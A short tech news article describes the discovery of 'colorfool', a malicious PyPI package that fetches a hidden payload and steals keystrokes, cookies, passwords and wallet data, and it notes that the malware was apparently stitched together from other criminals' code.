Another PyPl package was found to be just a payload of malware

Another PyPl package was found to be just a payload of malware

Security researchers have discovered another malicious PyPI package, whose goal is to steal people’s sensitive data and allow unauthenticated users to access the compromised endpoint.

They said the package, called “colorfool”, was clearly harmful. It contained a “suspiciously large” Python file whose only job was to download another file from the Internet and run it, making sure it remained hidden from the machine’s user.

“The post immediately looked suspicious and potentially malicious,” the report stated.

borrow code

To make matters worse, that wasn’t the only suspicious thing in this file. The URL from which the package needs to download the payload is hard-coded, which is another red flag.

A Python script – code.py – carries information-stealing functions, such as keylogging and cookie extraction. Besides, it was capable of stealing passwords, killing apps, taking screenshots, stealing encrypted wallet data, and even using the device’s webcam.

What makes this package different from all the other malicious PyPI packages that security researchers discover on an almost daily basis is its Frankenstein-like nature. The researchers suggest that the code was patched together from pieces of other people’s work, sometimes without regard to logic, code flow, or anything else. As if the author simply copied and pasted bits of code, often leaving redundant code to simply sit there.

Read more

> Hundreds of malicious PyPI packages wreak havoc on the Internet

> More data-stealing PyPI packages have been discovered

> Check out the best endpoint protection tools now

“The combination of the obfuscation along with the blatantly malicious code indicates that it is unlikely that all of the code was developed by a single entity,” the researchers said. “It is possible that the final developer has mostly used other people’s code, and added it by copying and pasting.”

In fact, the code holds the game “Snake” which doesn’t seem to serve any particular purpose.

For researchers, this is a great example of “democratization of cybercrime,” where threat actors can simply take code from other threat actors and incorporate it into their work.

  • Here are the best firewalls today

Via: The Register

Total
0
Shares
Leave a Reply

Your email address will not be published. Required fields are marked *

Prev
BetterHelp has been banned from sharing customer data with advertisers and social media giants
BetterHelp has been banned from sharing customer data with advertisers and social media giants

BetterHelp has been banned from sharing customer data with advertisers and social media giants

Online counseling platform BetterHelp shares users’ data with companies

Next
Google Meet calls will now remove background noise, even if you call from your phone
Google Meet calls will now remove background noise, even if you call from your phone

Google Meet calls will now remove background noise, even if you call from your phone

Google Meet calls are about to get quieter for phone users, thanks to an

You May Also Like